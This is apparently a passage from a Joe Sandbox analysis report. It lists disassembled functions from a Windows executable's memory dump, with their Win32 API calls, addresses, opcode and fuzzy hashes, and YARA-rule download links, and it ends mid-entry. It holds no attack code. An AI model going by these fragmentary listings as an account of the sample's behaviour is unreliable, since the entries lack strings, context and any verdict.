                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction ID: bd81dea388c134e700bb3edf266436083e7245bd16cd4cfe5c2fcb2e5757b027
                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction Fuzzy Hash: 21014C72100148BBDF125EA5CC42EEB7FADEF48799F045814FE48A6161C732E965EBA0
                                                      Function 00E63073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E313C6,00000000,00000000,?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue), ref: 00E630A5
                                                      • GetLastError.KERNEL32(?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue,00ED2290,FlsSetValue,00000000,00000364,?,00E62E46), ref: 00E630B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue,00ED2290,FlsSetValue,00000000), ref: 00E630BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: a0ba3fedbcaf790faf0721d147d4864af96674ac13cf9940e2745d57c3554875
                                                      • Instruction ID: db52643661ef02770ea33df6c6aaa7c8aa0ee4a82997dac73da9eaa16e316bef
                                                      • Opcode Fuzzy Hash: a0ba3fedbcaf790faf0721d147d4864af96674ac13cf9940e2745d57c3554875
                                                      • Instruction Fuzzy Hash: 4001FC32381622AFC7714B79BC44E577798EF05BE5B201620F919F3150C721D90AC6D0
                                                      Function 00E97464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00E9747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E97497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E974AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E974CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: e2688af53c60b072d336e604b816326b489b443d7e8a66e8ad0f7a967dac811c
                                                      • Instruction ID: 702c06d93a54285191a5be7f705efaa2a7417dee843c85a611f2c7fcf0e160b8
                                                      • Opcode Fuzzy Hash: e2688af53c60b072d336e604b816326b489b443d7e8a66e8ad0f7a967dac811c
                                                      • Instruction Fuzzy Hash: EB118EB12153109FEB208F15DC08F967BFCEB00B04F108569E6AAE6152D771E949DB90
                                                      Function 00E9B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B126
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 40a87aa3ac3d0bf41755f6b13f21321db77c99f647a7707254dcb29921567280
                                                      • Instruction ID: 8ceb42bc82830d9dda4d5137a978a6048b3adcebc22ddeabeed47f9c6f6a45b9
                                                      • Opcode Fuzzy Hash: 40a87aa3ac3d0bf41755f6b13f21321db77c99f647a7707254dcb29921567280
                                                      • Instruction Fuzzy Hash: DB116D31C0262CEBCF04AFE6EA68AEEBF78FF49711F115095D941B2281CB305655CB91
                                                      Function 00E92DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E92DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E92DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E92DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E92DE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: 8be88ed58308a0ad349fc80f88b2a9139b0a52e93adede56f3d557d27b1be998
                                                      • Instruction ID: 28b22ed6077268730297a660ea4dbb792282f5f82fa8cb16e1d70e44a3ab85df
                                                      • Opcode Fuzzy Hash: 8be88ed58308a0ad349fc80f88b2a9139b0a52e93adede56f3d557d27b1be998
                                                      • Instruction Fuzzy Hash: 31E06D715012247FDF201B639C0DEEB3E6CEF42FA5F101029F20AF10809AA28886C6B0
                                                      Function 00EC8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                        • Part of subcall function 00E49639: BeginPath.GDI32(?), ref: 00E496B9
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EC8887
                                                      • LineTo.GDI32(?,?,?), ref: 00EC8894
                                                      • EndPath.GDI32(?), ref: 00EC88A4
                                                      • StrokePath.GDI32(?), ref: 00EC88B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: 988ce9ac0c4e53c7c3e8d5dd1a122b328b4980af372ef5f9349dd27e0be3df5c
                                                      • Instruction ID: 485ffc9185c2b77e5ad7b8101ea9639277b9559abca7393c060ef3c2383d5529
                                                      • Opcode Fuzzy Hash: 988ce9ac0c4e53c7c3e8d5dd1a122b328b4980af372ef5f9349dd27e0be3df5c
                                                      • Instruction Fuzzy Hash: 01F0B836002218FAEB126F95AE0AFCE3F69AF06310F548014FA01710E2C7B61526DFE9
                                                      Function 00E498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00E498CC
                                                      • SetTextColor.GDI32(?,?), ref: 00E498D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00E498E9
                                                      • GetStockObject.GDI32(00000005), ref: 00E498F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      • Opcode ID: 271f5413588b46ecf1d20c9dfbfc54e7e798a303306e38693515959df54938bc
                                                      • Instruction ID: 7296984fa6b62be6792e04083e54222e3b09ee6b33b30e41fc8115c029d6cdd0
                                                      • Opcode Fuzzy Hash: 271f5413588b46ecf1d20c9dfbfc54e7e798a303306e38693515959df54938bc
                                                      • Instruction Fuzzy Hash: 26E06531644240AEDB215B76BC09FD93F21AB51336F288229F6FD740E1C37286469B10
                                                      Function 00E9162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00E91634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E911D9), ref: 00E9163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E911D9), ref: 00E91648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E911D9), ref: 00E9164F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 1b502eda8b52b1622bb39445b9a44cb4762fff30a3df68dc376dbedb4ab02012
                                                      • Instruction ID: 3a89a81060a4795f6eedb99f90deac4b7039edda87c101232cba41460bd47aec
                                                      • Opcode Fuzzy Hash: 1b502eda8b52b1622bb39445b9a44cb4762fff30a3df68dc376dbedb4ab02012
                                                      • Instruction Fuzzy Hash: F5E08671A01211DFDB201FA2AD0DF4A3B7CBF44795F284868F249E9090E635844BC750
                                                      Function 00E8D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00E8D858
                                                      • GetDC.USER32(00000000), ref: 00E8D862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8D882
                                                      • ReleaseDC.USER32(?), ref: 00E8D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 9d92fb0612debd8b859572a9af1c566394e48146bb9783b8002a0b11e058d824
                                                      • Instruction ID: 0de9790cfde2a0114c682b09e6f66a0a581789264cba42db23ab15574f1b945e
                                                      • Opcode Fuzzy Hash: 9d92fb0612debd8b859572a9af1c566394e48146bb9783b8002a0b11e058d824
                                                      • Instruction Fuzzy Hash: 82E01AB4804204DFCB41AFA1D90CAADBBF2FB08710F249029E84AF7350C73A9907AF40
                                                      Function 00E8D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00E8D86C
                                                      • GetDC.USER32(00000000), ref: 00E8D876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8D882
                                                      • ReleaseDC.USER32(?), ref: 00E8D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 469cb12115f0b99aaca2f0749c551fa70dac15b7e5165932c8231fce16fcfe07
                                                      • Instruction ID: 027f07ac40c3bf4914d16790200c40792ca1a8d5bb0aed0ff45d72ba0843ecd0
                                                      • Opcode Fuzzy Hash: 469cb12115f0b99aaca2f0749c551fa70dac15b7e5165932c8231fce16fcfe07
                                                      • Instruction Fuzzy Hash: B0E01A74800200DFCB409FA1D90CA6DBBF1BB08710F249018E84AF7350C73A99079F40
                                                      Function 00EA4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EA4ED4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      • Opcode ID: d9e8b8b2d0b5cdb99edb382051b6d12da026c70001627595f8332ee3440a5724
                                                      • Instruction ID: e93523991a971b6ef86d308c950abb1bf1fc996739eebcfa24e98097e781e54f
                                                      • Opcode Fuzzy Hash: d9e8b8b2d0b5cdb99edb382051b6d12da026c70001627595f8332ee3440a5724
                                                      • Instruction Fuzzy Hash: 7D9152B9A002049FCB14DF54C484EA9BBF1BF89308F19A099E44AAF392D775FD85CB51
                                                      Function 00EB7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(00E8569E,00000000,?,00ECCC08,?,00000000,00000000), ref: 00EB78DD
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • CharUpperBuffW.USER32(00E8569E,00000000,?,00ECCC08,00000000,?,00000000,00000000), ref: 00EB783B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper$_wcslen
                                                      • String ID: <s
                                                      • API String ID: 3544283678-2940880691
                                                      • Opcode ID: 32809400ce6bfd78575920198571d275fa4673d6dde8fa36d83f0821f856bc00
                                                      • Instruction ID: 828732abeeff87a07543a2b64d30fde22094da86e11566e684a9116898f228d0
                                                      • Opcode Fuzzy Hash: 32809400ce6bfd78575920198571d275fa4673d6dde8fa36d83f0821f856bc00
                                                      • Instruction Fuzzy Hash: 17616F72914129ABCF04EBE4CC95DFEB7B4BF94704F546125E582B3091EF306A45CBA0
                                                      Function 00E4E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 7b21dfb17ad1110601f385e469a2750274e5c02b9c9aa5011fed962d3fe66f53
                                                      • Instruction ID: bf44c24fb7a0becf057654f15f542e570be8f6593113908d33113c4feb8b10ce
                                                      • Opcode Fuzzy Hash: 7b21dfb17ad1110601f385e469a2750274e5c02b9c9aa5011fed962d3fe66f53
                                                      • Instruction Fuzzy Hash: F0514331A04246DFDB18EF68D481AFA7BA4FF15314F24A056E899BB3E0D7359D42CB90
                                                      Function 00E4F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00E4F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4F2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: a8fbe543381a8017dd243d1cf13c951f5d2b7f3b66c67027a8b13888c84e1d89
                                                      • Instruction ID: 7f79d8a1036897df4d44ae40140da68bfb1ab65020dd22c7ea05b9ea52199d0a
                                                      • Opcode Fuzzy Hash: a8fbe543381a8017dd243d1cf13c951f5d2b7f3b66c67027a8b13888c84e1d89
                                                      • Instruction Fuzzy Hash: E35159715087889BD320AF11DC8ABAFBBF8FB84300F81885CF1D961195EB308569CB66
                                                      Function 00EB5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00EB57E0
                                                      • _wcslen.LIBCMT ref: 00EB57EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      • Opcode ID: 715132e3b5f22b6d5bda39ac6bb8e0f4fc9b1510dc76e49b0e0f3ac2e5615190
                                                      • Instruction ID: 7682bc2997d9a5ad7cb1539fd9435c404f08fe04b615dbc2f85d7190e8145d77
                                                      • Opcode Fuzzy Hash: 715132e3b5f22b6d5bda39ac6bb8e0f4fc9b1510dc76e49b0e0f3ac2e5615190
                                                      • Instruction Fuzzy Hash: FA418C72A002099FCB18DFA9C886AFEBBF5EF59324F146029E505B7251E7309D81CB90
                                                      Function 00EAD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EAD130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EAD13A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: 880066afae90120354895fd52d8ee18097ddb541fac92d68ca81bea0c9c1be33
                                                      • Instruction ID: 296ec72ec49f6d1300a769876e6c8b20f06dd5595f944bcccf466499de2d58a6
                                                      • Opcode Fuzzy Hash: 880066afae90120354895fd52d8ee18097ddb541fac92d68ca81bea0c9c1be33
                                                      • Instruction Fuzzy Hash: AD313971D01209ABCF15EFA5CC89AEEBFF9FF19304F005019E815B6162E735AA46CB60
                                                      Function 00EC356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00EC3621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC365C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
